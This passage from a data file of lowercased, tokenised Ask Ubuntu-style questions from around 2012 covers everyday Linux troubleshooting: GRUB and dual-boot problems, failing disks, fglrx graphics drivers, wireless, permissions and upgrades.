*** [ _module_/home/matt/downloads/dwa121_linux_driver_20140620110309/rtl8192cu_linux_v2.0.1406.20110309 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.5.0-19-generic' make : *** [ modules ] error 2
227686	xubuntu 12.10 does n't save screen brightness on reboot	i have a laptop running xubuntu 12.10 that does n't save the brightness setting on reboot . there are some explanations on ask ubuntu about how to have a specific brightness be set on reboot , but not how to save the brightness from last time . how can this be done ?
227689	internal hard drive , ca n't format	i can not format anymore the hard drive of my laptop . here is how i proceed : i am starting my computer with a usb live drive ( ubuntu 10.04 lts - the lucid lynx ) . then i start disk utility and try to format the hard drive - i choosed to format the master boot record but i get the following error : error creating partition table : helper exited with exit code 1 : error calling fsync ( 2 ) on /dev/sda : input/output error if i try to delete partitions i get the following error error erasing : helper exited with exit code 1 : in part_del_partition : device_file=/dev/sda , offset=32256 entering ms-dos parser ( offset=0 , size=30005821440 ) msdos_magic found looking at part 0 ( offset 32256 , size 4096157184 , type 0x83 ) new part entry looking at part 1 ( offset 10618836480 , size 8414461440 , type 0x83 ) new part entry looking at part 2 ( offset 19033297920 , size 1077511680 , type 0x82 ) new part entry looking at part 3 ( offset 20110809600 , size 9895011840 , type 0x07 ) new part entry exiting ms-dos parser msdos partition table detected got it got disk got partition - part- > type=0 error : input/output error during write on /dev/sda ped_disk_commit_to_dev ( ) failed if i try to install ubuntu frrom the usb on the hard drive and choose erase and use the entire disk i get the error message input/output error during write on /dev/sda for side infos i have at the moment 4 partitions on my hard drive : /dev/sda1 ( ext2 ) /dev/sda2 ( ext2 ) /dev/sda3 ( swap ) /dev/sda1 ( ntfs ) + /dev/sda ( unlocated space ) my ultimate goal is to reinstall ubuntu and have only 2 partitions ... i would really appreciate any help here ! thanks jb @ psusi i tried what as written in the other message qnd i got the following : ubuntu @ ubuntu : ~ $ sudo badblocks -b 512 /dev/sda 52464512 52464520 52464521 52464522 52464523 52464524 52464525 52464526 52464527 ubuntu @ ubuntu : ~ $ sudo dd if=/dev/sda of=/dev/null iflag=direct bs=512 skip=52464512 count=1 1+0 records in 1+0 records out 512 bytes ( 512 b ) copied , 0.0296602 s , 17.3 kb/s ubuntu @ ubuntu : ~ $ sudo dd if=/dev/sda of=/dev/null iflag=direct bs=512 skip=52464520 count=1 1+0 records in 1+0 records out 512 bytes ( 512 b ) copied , 0.000283555 s , 1.8 mb/s ubuntu @ ubuntu : ~ $ sudo dd if=/dev/sda of=/dev/null iflag=direct bs=512 skip=52464521 count=1 1+0 records in 1+0 records out 512 bytes ( 512 b ) copied , 0.000283835 s , 1.8 mb/s ubuntu @ ubuntu : ~ $ sudo dd if=/dev/sda of=/dev/null iflag=direct bs=512 skip=52464522 count=1 dd : reading `/dev/sda ' : input/output error 0+0 records in 0+0 records out 0 bytes ( 0 b ) copied , 30.8623 s , 0.0 kb/s ubuntu @ ubuntu : ~ $ sudo dd if=/dev/sda of=/dev/null iflag=direct bs=512 skip=52464523 count=1 1+0 records in 1+0 records out 512 bytes ( 512 b ) copied , 0.0370136 s , 13.8 kb/s ubuntu @ ubuntu : ~ $ sudo dd if=/dev/sda of=/dev/null iflag=direct bs=512 skip=52464524 count=1 1+0 records in 1+0 records out 512 bytes ( 512 b ) copied , 0.00264196 s , 194 kb/s ubuntu @ ubuntu : ~ $ sudo dd if=/dev/sda of=/dev/null iflag=direct bs=512 skip=52464525 count=1 1+0 records in 1+0 records out 512 bytes ( 512 b ) copied , 0.00303921 s , 168 kb/s ubuntu @ ubuntu : ~ $ sudo dd if=/dev/sda of=/dev/null iflag=direct bs=512 skip=52464526 count=1 1+0 records in 1+0 records out 512 bytes ( 512 b ) copied , 0.0029378 s , 174 kb/s ubuntu @ ubuntu : ~ $ sudo dd if=/dev/sda of=/dev/null iflag=direct bs=512 skip=52464527 count=1 1+0 records in 1+0 records out 512 bytes ( 512 b ) copied , 0.00647233 s , 79.1 kb/s ubuntu @ ubuntu : ~ $ sudo dd if=/dev/zero of=/dev/sda oflag=direct bs=512 seek=52464522 count=1 dd : writing `/dev/sda ' : input/output error 1+0 records in 0+0 records out 0 bytes ( 0 b ) copied , 7.88114 s , 0.0 kb/s ubuntu @ ubuntu : ~ $ i am not sure what to do next ...
227691	searching for executable files	is there a way to search and delete all executables files within folder if there is no extension ? e.g let 's suppose i have 4 files with .ubu extension and the following bash does the job i 'm asking for : rm *.ubu e.g_2 now let 's suppose i have 4 but there is no extension at all , something like : test test_2 test_3 ( chmod +x on them ) how do i delete those files ?
227697	function inside .profile results in no log-in	i 've created a custom function in my .profile , and i 've added right at the bottom , after my custom aliases : # custom functions function eclipse-gtk { cd ~/development/eclipse-juno ./eclipse_wb.sh & cd - } the function starts a custom version of my eclipse . after i 've added it , because i did n't wanted to log-out/log-in , i 've reloaded my profile with the command : . ~/.profile and then i 've tested my function by calling eclipse-gtk and it worked without any issue . today when i booted , i could n't log in . after providing my password , in a few seconds i was back at the log-in screen . dropping to command line using ctr + alt + f1 , i 've commented out the function in my .profile and the log-in was possible without any issue . my question is , what did i do wrong when i wrote the function ? and if there is something wrong , why did it work yesterday after reloading the profile . thanks in advance . using : ubuntu 12.04
227698	what could cause ubuntu to start loosing devices ( 12.10 , t420 )	i recently upgraded ubuntu on a laptop where it had been running flawlessly for some time . it 's a dualboot setup and all of the devices work fine under windows 7 however the wifi did not work correctly and my usb mouse was not recognized this morning after i plugged it in . i 'm looking in dmesg and /var/log/ and do n't even see the wireless ( centrino ultimate-n 6300 agn ) . does this mean it 's just not supported by the kernel i 'm running ? if i boot my older kernel from the boot menu wi-fi works fine .
227699	chroot java application	i would like to chroot subsonic on my ubuntu server . all the ubuntu doc talks about chroot another version of linux or ssh ... how can i install chroot jail for a java application ?
227700	empathy on 12.10 was connecting to windows live until recently	i was connecting my windows live account just fine to empathy until today . i 've been away for a few days so the problem may have started a few days back . it 's coming up wanting me to grant access . i 've gotten past the login screen and hit the `` yes '' button to grant access but the online accounts keeps popping up the `` grant access '' button .
227703	any alternatives to grub2 for 12.10 ?	i have installed legacy drivers on 12.10 using makson96 ppa . fglrxinfo detects my video , but ati loads vesa driver instead of fglrx . in xorg log i see , that fglrx can not detect my card and because of it loads vesa . i think , that change of a bootloader will help . i have downgraded to grub 1 , but the same result . thank you for support in advace .
227708	ubuntu ( liveusb , not hard install ) `` suddenly '' wo n't boot from usb stick after windows xp format	i formatted because the windows xp i was using would n't let me view the drive in the window without formatting first , so i just said what the heck . turns out , after using the linux usb creator , placing the iso on disc properly and booting , bios hangs ; no bootloader , no startup , nothing . windows xp 's formatting screwed something up with my usb 's filesystem , and i 'm uncertain of what to do . help ? ! my business depends on me using an os , so prompt ideas are a must and very appreciated ( no money ) .
227712	vmware unity mode with ubuntu 12.10	this is a very difficult thing to search for , and find an answer to because of the unfortunate choice vmware and ubuntu both having something called `` unity '' . my host operating system is windows 7 - 64 bit , running vmware workstation 9.0.1 . i have a virtual machine running ubuntu 12.10 - 64 bit . when i attempt to put vmware in `` unity mode '' , i get the following message : the virtual machine can not enter unity mode because : - unity is not supported on the guest operating system . from the vmware site , there is nothing listed that says that ubuntu is not supported for this ... and i have installed the latest vmware-tools on the guest operating system . it seems like a lot of people have had this issue , but i have n't seen a good resolution to it yet . does anyone know how to get unity mode working with ubuntu ?
227713	install apps to another disk	i have very little space left on my main hard drive ( the one that i installed ubuntu on ) and need to install apps from the software center to another disk like in windows xp . how can i proceed in doing this ?
227716	save last `` copy '' from clipboard to file	i am able to copy a massive string of text but unable to paste it anywhere without the program crashing . so , i wonder : how can i fetch it from the clipboard via cli and save it to a file instead ? thanks !
227721	fglrx : no matching device section for instance ... found . how to fix it ?	i have hd 4850 card , ubuntu 12.10 and installed legacy drivers using makson96 ppa . the issue is , that fglrx can not detect my device and loads vesa bios . i had the same problem on ubuntu 11.10 , 12.04 versions . i want to manually help fglrx find a matching device to load as it shoudld do . it is interesting , why does fglrx search for a device in a pci:0 @ 1:0:1 bus ? in xorg.cof different bus is indicated : section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' busid `` pci:1:0:0 '' endsection fglrxinfo display : :0.0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : ati radeon hd 4800 series opengl version string : 3.3.11653 compatibility profile context here is a part of my xorg log : [ 3.846 ] ( ii ) vesa : driver for vesa chipsets : vesa [ 3.846 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 3.846 ] ( ++ ) using vt number 7 [ 3.846 ] ( ww ) falling back to old probe method for fglrx [ 3.883 ] ( ii ) loading pcs database from /etc/ati/amdpcsdb [ 3.883 ] ( -- ) assigning device section with no busid to primary device [ 3.883 ] ( -- ) chipset supported amd graphics processor ( 0x9442 ) found [ 3.884 ] ( ww ) fglrx : no matching device section for instance ( busid pci:0 @ 1:0:1 ) found [ 3.884 ] ( ii ) amd video driver is running on a device belonging to a group targeted for this release [ 3.884 ] ( ii ) amd video driver is signed [ 3.884 ] ( ii ) fglrx ( 0 ) : pent- > device- > identifier=0xb7791d8f [ 3.884 ] ( ww ) falling back to old probe method for vesa [ 3.884 ] ( ww ) falling back to old probe method for fbdev from lispci i foud out finally , that my video card is in 01:00.0 slot . logically , if fglrx searches for a vdeo card device in a wrong place , it will not find it . 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati rv770 [ radeon hd 4850 ] the log also says : ( ww ) fglrx ( 0 ) : board is an unknown third party board , chipset is supported thanks in advance .
227722	kmix and banshee and other applications	is it possible to control individual applications in kmix ( i 'm using kubuntu 12.10 ) without having to click 'restore ' ? i 'm hoping for an open-on-right-click temporary window . also , how do you integrate banshee into the kmix sound control ?
227725	public_html permissions for local development	i know this question has popped up a couple times , but i ca n't seem to find a definitive answer to my issue , so please bear with me . i have ubuntu server 12.04 setup in virtualbox for php development and testing ( drupal plus other php sites using yii framework ) . my question is in 3 parts ... 1 ) if i create a public_html folder under /home/myuser , do i need to give ownership of that folder to the apache www-data group ? if so , are there any specific permissions i should be setting ? 755 ? ( btw , i am following this guide to create the public_html directory and set up multiple virtual hosts per site i create and test ) i previously had all of my sites under /var/www , but ran into massive permission denied errors whenever i tried to sftp to it , either through filezilla or phpstorm . this is what i had previously done : sudo chgrp www-data /var/www sudo chmod -r 775 /var/www sudo chmod -r g+s /var/www sudo usermod -g www-data [ my_ftp_user ] 2 ) the second part of my question is this : if i create my php project and files in windows through phpstorm , and then upload via sftp , will permissions get affected ? 3 ) once i am satisfied with my developed project , would it be advisable to move and test them under /var/www to see how it would fair in a production-ish environment ? i would really appreciate the help and advice here . i 'm learning more as i go along , but dealing with linux files and permissions is a bit of a new ballgame for me ! thank you
227726	adding program booting options to the os	i am building a flight simulator box , off of ubuntu 12.10 , but i am trying to make the os essentially invisible , i just want the machine to boot into the flight sim , which , that part is n't really that difficult , just a matter of adding a startup item , but i would like to make it a bit more seemless , and in-addtion to that , i would like maybe a 3-5 second countdown where you could opt-out of the flight sim from starting , if you need to troubleshoot the os , or the flight sim itself , and i have no idea how that would be accomplished
227727	need to modify gnome 3 theme for browser	i have recently begun using the darkgreen theme for gnome 3 , however there are some problems on some webpages in firefox regarding text input fields . this happens in the search field on google , some fields on facebook , etc ... this theme uses a dark background and light color text for input fields by defaut . i have managed to modify the foreground color of input text succesfully for those fields that were never affected ( from near white to gray ) , but it does n't help for the `` broken '' fields . i also want to change the background color for all input fields to white , but i get no luck with that either . in the theme folder there is a gtk folder with a css file . here are the relevant contents , the comments are what i changed : @ define-color theme_base_color # 202020 ; @ define-color theme_text_color # 25dc00 ; /* # ffffff */ @ define-color theme_bg_color # 121212 ; @ define-color theme_fg_color @ theme_text_color ; @ define-color selected_bg_color # 3e8753 ; @ define-color selected_fg_color # ffffff ; @ define-color theme_selected_bg_color @ selected_bg_color ; @ define-color menu_bg_color # 555555 ; @ define-color menu_fg_color @ theme_text_color ; @ define-color menu_combobox_border @ theme_selected_bg_color ; @ define-color menu_separator mix ( @ theme_bg_color , @ menu_bg_color , 0.90 ) ; @ define-color insensitive_bg_color alpha ( # 0b0b0d , 0.0 ) ; @ define-color insensitive_fg_color alpha ( # 717171 , 0.50 ) ; @ define-color insensitive_border_color alpha ( # 717171 , 0.50 ) ; @ define-color entry_text_color /* # fafafa */ # 707070 ; @ define-color entry_background_a # ffffff ; @ define-color entry_background_b # ffffff ; @ define-color entry_background_c # ffffff ; @ define-color entry_background_d # ffffff ; /* 121212 */ @ define-color frame_color # 707070 ; is this css file the only thing i would need to change ?
227728	how to update to the latest version of ubuntu ( 12.10 )	i am attempting to update my computer 's operating system with ubuntu 12.10 . how do i update my operating system to ubuntu 12.10 when i am already using 12.04 ? how can i create a disc onto which to load ubuntu 12.10 o/s from the ubuntu 12.04 o/s ?
227736	cpu temperature above normal ( 92 c )	i have just installed ubuntu 12.04 and after running it on my laptop for few hours i decided to check the cpu temperature with acpi -t and it said 92 degrees celsius when i ran windows 7 , it always shows between 48 and 51 degrees c , anyone know what might be causing this overheating problem .
227740	unable to create a wireless hotspot in ubuntu ?	i am trying ubuntu 12.10 on a sony laptop . i have created a hotspot in the wireless network options and it was working fine . then i stopped hotspot and tried to turn on the wireless internet but this is not working and adapter appears to be switched off . this laptop is dual boot system having windows 7 . even if i attempt to access the wireless network in windows 7 it is not working . how can i resolve this issue ?
227741	how to completely reinstall ubuntu ?	i really screwed up my computer and i 'm pretty sure a clean install is my only option . i used a cd to install it . how to i uninstall and reinstall ubuntu ? acer aspire 3690
227743	problems installing from disk	i have 267gb of unallocated space that i want to install onto . ( installing eos , but the installer is the same ) . i was going to use the option for a custom install , but did n't know where to put the boot loader . i use windows7 . i also wanted to know if i should create a new partition from windows . or if i can do that from the installer . thanks !
227744	terminal limits scrolling	i have a running log , it outputs a lot to the terminal . unfortunately , when i try to scroll up and view older output , it appears there is a limit . and i am unable to scroll past a certain point . on the mac , the terminal allows you to scroll up to the start of the session . is there a way to do this in ubuntu terminal ?
227747	disable activity recording for nested folders	i 'm using ubuntu 12.10 , and in the 'privacy ' settings , under 'do n't record activity for the following folders ' , i have ( among others ) my ubuntuone folder , because i use it mostly to keep a backup of work projects on my laptop . however , it seems like the activity recording is only blocked for the folder you specify ( and not nested folders ) ... is there any way to have it ignore all the nested folders too , or do i have to manually change the paths each time my work files are renamed ?
227750	ubuntu installed on windows , formatting	currently i have ubuntu `` installed on windows '' and i was thinking about formatting and installing windows 8 , but i want to keep my ubuntu os . so my question was what could be done so i do n't lose the information while i format ( i do n't have the hdd partitioned for each os ) . thanks in advance !
227754	how can i modify the kernel when i already have ubuntu running on my machine ?	sorry if this is an extremely stupid question , but i 'm brand new to linux and i 'd like to try to figure out how to modify my own system . from what little i know so far about linux , i would imagine that what i 'm actually looking for is the kernel 's source code . i know that there are some resources out there that would allow me to download a copy of the kernel ( like kernel.org ) , but presumably that is just a copy , and i would have to switch from my current kernel to that new one after modifying it in order to see the changes that i make take effect . is there a way to avoid doing that , and just modify the kernel that i already have ? and if not , how do i tell ubuntu to use the new kernel that i 've downloaded rather than the original one ? and how do i know whether or not my changes will screw up the system ? thanks in advance for your help !
227755	how to default terminal startup ?	i know that you can show the process of starting up by pressing alt + space during startup how do you have that as default on your computer ? also i would like to see it on shutdown if possible .
227756	grub2 access denied error	i have created a dual boot ( both os are kubuntu 12.10 and both with encrypted home do n't ask me why , i just wanted to try the pre-boot authentication of grub2 ) and i 've created a partition table like this : /dev/sda1 /boot /dev/sda2 /root kubuntu1 /dev/sda3 /root kubuntu2 and installed grub2 in /boot partition . then i 've modified grub2 40_custom adding superuser and 2 users ( one for the kubuntu1 and one for kubuntu2 ) as shown in this guide : https : //help.ubuntu.com/community/grub2/passwords in order to boot with preboot password but only super user and kubuntu1 users works . when i try to enter the second user it says : '' access denied : loading the default entries and list failed '' any suggestions about that ?
227758	how do i backport vlc from 12.04 to 10.04 ?	i just want to install vlc latest from 12.04 lts to 10.04 lts how to do it ?
227761	why is my fresh ubuntu install ( from usb drive ) stuck on a blank screen with a blinking cursor ?	i am about to use ubuntu for the first time and i have successfully installed it from my usb drive . however , in the process of installation , my laptop has been on a blank screen with a blinking cursor for almost six hours . whatever the heck is going on ? even if i restart , it goes back to that mode . am i being impatient or will it remain so for eternity ? what should i do now ?
227766	ubuntu 12.04 lts and windows 8 dual os	i have gone through several answers listed and had a look at quite a few forums already . i understand that the root cause is the windows 8 grub . when i check msconfig , it does not populate ubuntu . my question is , is there any way to overwrite windows grub with ubuntu ? and also for background , i was running windows 7 and ubuntu dual . i upgraded 7 to 8 and have been having this problem ever since . ubuntu was my primary os so it 's pretty fail of me to simply upgrade to win 8 like this . however , i want to try and get ubuntu 's grub to be the primary loader so that i do n't have to reimage my os partition . any help is most appreciated .
227770	upgrade from 12.04 to 12.10 without losing files ?	i accidentally exited the window asking me to upgrade to 12.10 , and now i ca n't find a way to upgrade other than wiping my drive and installing the latest iso .
227773	why does rebooting with control alt delete not require superuser privileges	when you press control alt delete in a terminal , your system reboots . this does not prompt for authentication to reboot . however , running sudo reboot does require authentication as a sudoer to execute . these commands appear to be doing the same thing . why does one of them require superuser privileges , and the other does not ?
227777	enabling initrd and kernel boot messages grub2	in the changelog for grub2 on ubuntu , i noticed that several versions ago it was decided by the maintainers to : suppress kernel/initrd progress messages , except in recovery mode this is counter productive for server installs as it can render a system unbootable and without a method to learn about the possible problem . my question is simple - how does one revert to showing all initrd and kernel boot messages including the processing of init.d scripts before the login prompt ? ( ie . enable printing of all initrd/kernel progress messages ) i 've tried the various `` solutions '' discussed in answer to similar questions and can not find a simple , works-everywhere solution . fyi , i 'm using grub version 1.99-21 , but afaics the change to suppress kernel/initrd progress messages was made well before that version .
227780	error message `` failed to download repository information '' when attempting to check for updates via update manager	this comes up sometimes when i attempt to check for updates . i have been trying to upgrade from 12.04 to 12.10 , but i have been unsuccessful , due to the fact that update manager is not giving me the option to upgrade .
227782	how to customize unity launcher 's background	in this question i do not want to customize the launcher for each workspace , or change the animations or behaviors of the icons . i only want to change how the background of the launcher looks . let me show you what i mean : if i do not open the dash , the launcher looks like the following : it looks like this because i have a background that has gray , black and white colors . so unity tries to accommodate the launcher to contrast with it . now when i open the dash , the launcher looks like this : what i want is to make the launcher look the same as if my dash were open ( darker , richer background ) . i thought maybe to invert the colors of an opened dash with a closed one , but that the end i do not care if the colors do change when i open the dash , so long as the darker richer version stays . is it possible to do this , to make the background stay with a darker color like shown in the pictures above ?
227783	how do i make empathy match my keyring with my password ?	i changed my password a few months ago from the password i first used when i installed ubuntu on my machine . i tried to add a google talk account to empathy , but every time empathy gives me a message saying the following : enter password to unlock your login keyring the password you use to log in to your computer no longer matches that of your login keyring . i do not remember my original password and i 'm not sure if i should go to prefrences > passwords and keys and delete my login password or if there is a way to change the keyring so that it matches up with my current password .
227790	ubuntu freezes right after loading	new install of ubuntu 12.04 i386 desktop.iso on a toshiba satellite intel celeron m gets to the desktop screen and freezes the mouse still moves but nothing responds to it started terminal by pressing ctl+alt+f1 tried `` startx '' and got this ( i cant copy and paste but i will do my best to avoid typos ) : fatal server error : server is already active for display 0 if this server is no longer running , remove /tmp/.x0-lock and start again please consult the x.org foundation support for help ddxsgiveup : closing log xio : fatal io error 11 ( resource temporarily unavailable ) on x server `` :0 '' after 7 requests ( 7 known processed ) with 0 events remaining . xxxxxx @ aaaaaa-satellite-a105 : ~ $ tried `` startx -- :1 '' just took me back to the default wallpaper with nothing else mouse still moves but nothing else
227791	how do i install libaio ?	i 'm trying to install libaio with following command line : sudo apt-get install libaio and sudo apt-get install automake libtool autoconf gcc-g++ gcc libaio libaio-dev make but both of them does n't work for me . how do i install libaio ?
227792	wireless firmware missing on acer 3690	i have 12.04 on an acer 3690 and everything works perfectly except for the wireless internet . it says `` firmware missing '' . i 've already done the additional drivers thing , and that did n't help . any suggestions ? i 'm new to ubuntu , so make them easy to understand : ) thanks !
227793	installing ubuntu 12.10 on a laptop with windows 8 pre installed , such that bootloader of windows 8 is used	how do i install ubuntu 12.10 on a laptop with windows 8 pre-installed , such that the bootloader of windows 8 is used everytime the laptop boots .
227794	ca n't install any linux distro	i have been trying to install ubuntu on my step-son 's netbook and i checked and his hard disk seems to be failing and i keep getting an error message that ubuntu is unable to install due to hard disk failure . i was wondering how and if it is possible to install ubuntu on this hard disk without it giving me an error message . i have tried the alternate install disk image and the regular desktop image and get basically the same error message . is there a way to somehow override this and get it installed
227795	can i use ubuntu one to sync data fiies between two remote computers	i 've got two computers , both running ubuntu with files in their home folders sync 'd in to ubuntu one . i 'd like to know if it 's possible to make ubuntu one automatically download data changes that have been uploaded automatically to ubuntu one from one computer to the equivalent data file in the other . clarifying a bit further , i 've installed red notebook in both computers and so they each have their own /.rednotebook/data folder containing a series of .txt files corresponding to the monthly entries in each of them . these are sync 'd to upload any changes to those .txt files to ubuntu one . my question is can i , and if so how , do i make ubuntu one automatically download and replace those .txt files in the other computer after they 've been updated and uploaded from the first computer ? i did labouriously manage to download all those text files which had been uploaded from the first computer , from ubuntu one one-by-one to the second computer , but what i want to do is automate this process and that 's where i 'm stuck . i 'm aware that things could get a bit complicated if both my computers were on-line at the same time and both were simultaneously making different red notebook entries , so that 's not the scenario i 'm trying to cover . all i want to achieve is that whatever updates to the files have been uploaded by one computer , will automatically be downloaded to the same-named files in the other computer as soon as that second computer appears on line and detects that ubuntu one has matching but more recent sync 'd files than the ones it 's holding .
227802	problems to boot , ubuntu entry does not work anymore	a few months i decided to install ubuntu 12.04 on my pc alongside with my windows 7 partition . in order to do that and avoid any mistake , i followed these steps : http : //www.linuxbsdos.com/2012/05/17/how-to-dual-boot-ubuntu-12-04-and-windows-7/2/ everything was going well until i decided to update to the 12.10 realese . i do n't know what happened , but after i updated my ubuntu , it stoped working , it did n't even launched , when i turned on my pc and choose to run `` ubuntu 12.04 '' on the grub screen , a weird messaged appeared . well , so i decided to install the ubuntu 12.10 and forget about the 12.04 partition , no problem . i erased the partitions used for the ubuntu 12.04 with easeus partition manager . however , when i start my pc , there is still the option of `` ubuntu 12.04 '' to chose , is that bad ? and what about now , can i use the windows installer of ubuntu ( http : //www.ubuntu.com/download/help/install-ubuntu-with-windows ) to install the ubuntu 12.10 ? what should i do to have ubuntu 12.10 and windows 7 in dual boot again ? thanks ; thales .
227803	how to ubuntu upgrade from 10.10 to 12.10 32-bit	i have ubuntu 10.10 installed . kindly let me know if there are upgrades for changing my version of ubuntu . thank you for your kind help .
227811	unity elements sometimes appear while full screen in virtualbox - how to stop it ?	launcher is great , and it helps me finds stuff . i have the latest release of 12 . but when i 'm full screen in virtualbox running another operating system and i hit some key combination i have n't yet figured out , unity suddenly grabs keyboard focus . it might be alt-tab , it might be left-control x. i have physically pulled both the windows key and fn key off my laptop because they get in the way , so it 's probably not the windows key . you do n't know the focus has been stolen because the full screen app ( virtualbox ) is still full screen and the unity element is in the background . but you 're busy typing into a unity box , not your foreground application . this is particularly annoying . in my screenshot ( taken from a camera , because the built in screen capture program ca n't capture a screenshot containing the launcher ... ) the windows vm is the foreground application , but the `` run command '' entry box has come up and is capturing the keyboard : i would like a foreground full screen app to stay that way . is there a way that i can keep unity but only have it activate its elements ( e.g . pop out with its search box ) if i physically click a button , not type some random key combination that foreground applications can get confused about ? otherwise i can do without the launcher or other elements , because doing my actual work is more involved than just launching programs .
227814	wireless broken by updates	i just ran updates in 12.10 using update manager & now my wireless is not working . it worked great before the updates . any thoughts ? my hardware is : laptop : hp envy 6 sleekbook ram : 8 gb hdd : 500 gb + 32 gb sdd video : ati radeon hd 7430 wifi : broadcom 4313
227815	ntfs partition resizing wubi ubuntu boot problem	after resizing the ntfs partition where wubi ubuntu is in , or installing opensuse 12.2 , i 'm not sure , my wubi ubuntu can not boot to the login screen ( gui ) , in the command line screen displaying a message says so such a device f39cxxxxxxxxxxxxx ... .what i can do to fix this ?
227816	how to monitor website stats from the terminal ?	is there any way to monitoring the stats from my own website .. like example.com .. just via our terminal without installing plugins .. so we can see real time visitor and bots came and go at website .. what im means i dont need to go to my cpanel to see who came and who are leaving here the photos that i hope i saw the stats at my terminal
227817	installing ubuntu with windows 8	i already have windows 8 installed and wish to installed ubuntu and continue using both windows 8 and ubuntu . how do i install ubuntu now ?
227821	ubuntu 12.10 on macbook pro 9,1	i am attempting an install of ubuntu 12,10 on a non retina macbook pro 9,1 . this is an ubuntu only install without the use of refit or refind . the install disc boots and the installation proceeds without any problems . once complete , i bless the boot partition under osx from the install media and reboot . upon rebooting , i get dumped to a black screen with flashing cursor . from this ask thread , it sounds like the nvidia drivers are failing . attempted this driver installation through a chroot mount to no avail . i am convinced the boot failure has more to do with efi that graphics drivers . does anyone have any suggestions ?
227825	how do i switch the ubuntu nexus 7 onscreen keyboard to show `` ( ) '' , `` { } '' characters ?	i managed to get the `` ( `` and `` ) '' characters displayed once in the onscreen keyboard but i do n't know how i did it . what is the secret to getting these special characters to be included ?
227826	external download manager for firefox and chrome	is there an external download manager for ubuntu 12.10 that will easily integrate with chrome and firefox and has pause and resume functionality and other features that kick ass ? i loved orbit download manager for windows and i am looking for something similar
227827	pinch to zoom on thinkpad x1 carbon	i have a nice new thinkpad x1 carbon . is there a way to enable pinch to zoom ? i 'm using ubuntu 12.04 .
227828	all i have is an rdp file and ip address . how do i remotely connect using them ?	i am trying to access one of my school 's windows 7 machines remotely . for this , they provide an rdp file to establish the connection with after you fill out connection settings on an online form ( remote desktop size , local resources , etc . ) , under the assumption that you are using windows or mac . they also provide an ip address and port number in case i `` choose to manually connect '' to my assigned machine , but they provide no further instructions on how to use it . i would like to be able to connect to this machine remotely using ubuntu . preferably , i 'd like to try using the new remote login feature in 12.10 to connect , although i guess i could try remmina if that wo n't work . i tried naively entering my assigned ip address and port , and my school username and password , into both uccs for remote login and into remmina for a new rdp connection , but neither would let me connect ( the former hangs at my laptop 's login screen for a couple minutes before saying the password is incorrect , while the latter ca n't establish a connection at all ) . what step-by-step instructions should i use to make a connection based on what i was given ?
227838	how do i store wine related program files in ubuntu 's partitions ?	hi guys i loved linux operating systems and trying out new now . i have installed ubuntu 12.04 . i am using wine & playonlinux to run windows programs . i an having a little problem . whenever i save a edited file its shows option to save in `` virtual drive '' . how can i access the files from ubuntu desktop ? is there anyway i can save my files directly to the local partitions of my system ?
227839	how to make a partition ubuntu can read ?	i have windows vista and i installed ubuntu 12.04 along with it . i have three partitions on my hard-drive on windows , but when i open the laptop through ubuntu it only reads the first and second partition . is there a way i can get it to read the third one as well so that i 'm able to access it through ubuntu and not just windows ?
227841	ubuntu unable to connect to internet at work network	hi i had been using windows at my work network and i recently asked the it support to change my os to ubuntu . they have installed the os but i am not able to connect to the wired internet . the output of ipconfig/all is : ipconfig /all windows ip configuration host name . . . . . . . . . . . . : 01hw****** primary dns suffix . . . . . . . : xxxx.xxx.com node type . . . . . . . . . . . . : hybrid ip routing enabled . . . . . . . . : no wins proxy enabled . . . . . . . . : no dns suffix search list . . . . . . : xxxx.xxx.com xxxx.xxx.com xxx.com ethernet adapter local area connection 4 : connection-specific dns suffix . : description . . . . . . . . . . . : vmware virtual ethernet adapter for vmnet8 physical address . . . . . . . . . : 00-xx-xx-xx-xx-xx dhcp enabled . . . . . . . . . . . : yes autoconfiguration enabled . . . . : yes ip address . . . . . . . . . . . . : 192.168.xx.x subnet mask . . . . . . . . . . . : 255.255.255.0 default gateway . . . . . . . . . : dhcp server . . . . . . . . . . . : 192.168.xx.xxx primary wins server . . . . . . . : 192.168.xx.x lease obtained . . . . . . . . . . : tuesday , december 11 , 2012 12:30:32pm lease expires . . . . . . . . . . : tuesday , december 11 , 2012 1:00:32 pm ethernet adapter vmware network adapter vmnet-1 : connection-specific dns suffix . : description . . . . . . . . . . . : vmware virtual ethernet adapter forvmnet1 physical address . . . . . . . . . : 00-xx-xx-xx-xx-xx dhcp enabled . . . . . . . . . . . : no ip address . . . . . . . . . . . . : 192.168.xx.x subnet mask . . . . . . . . . . . : 255.255.255.0 default gateway . . . . . . . . . : ethernet adapter local area connection : connection-specific dns suffix . : xxxxx.xxx.com description . . . . . . . . . . . : intel ( r ) 82566dm-2 gigabit network connection physical address . . . . . . . . . : 00-xx-xx-xx-xx-xx dhcp enabled . . . . . . . . . . . : yes autoconfiguration enabled . . . . : yes ip address . . . . . . . . . . . . : 172.20.xx.xxx subnet mask . . . . . . . . . . . : 255.255.240.0 default gateway . . . . . . . . . : 172.20.xx.x dhcp server . . . . . . . . . . . : 172.20.xx.xx dns servers . . . . . . . . . . . : 172.20.xx.xx 172.20.xx.x lease obtained . . . . . . . . . . : tuesday , december 11 , 2012 4:00:38 am lease expires . . . . . . . . . . : wednesday , december 12 , 2012 4:00:38 am ethernet adapter network connect adapter : media state . . . . . . . . . . . : media disconnected description . . . . . . . . . . . : juniper network connect virtual adapter-teefer2 miniport physical address . . . . . . . . . : 00-xx-xx-xx-xx-xx i have replaced the numbers with 'x ' for security purpose . how do i configure these details in ubuntu ? especially the primary dns suffix ? i believe if i do that i might be able to connect to the internet .
227843	ubuntu 12.10 freezez on startup , ocassionally	i am running ubuntu 12.10 on a virtual machine ( vmware ) . no sometimes , about 50 % of the time , when i start the machine up , it freezes at a point , most of the time at the point shown in the attached image ( see image ) . when resetting the virtual machine once or twice , it boots normally again . how can i fix this ?
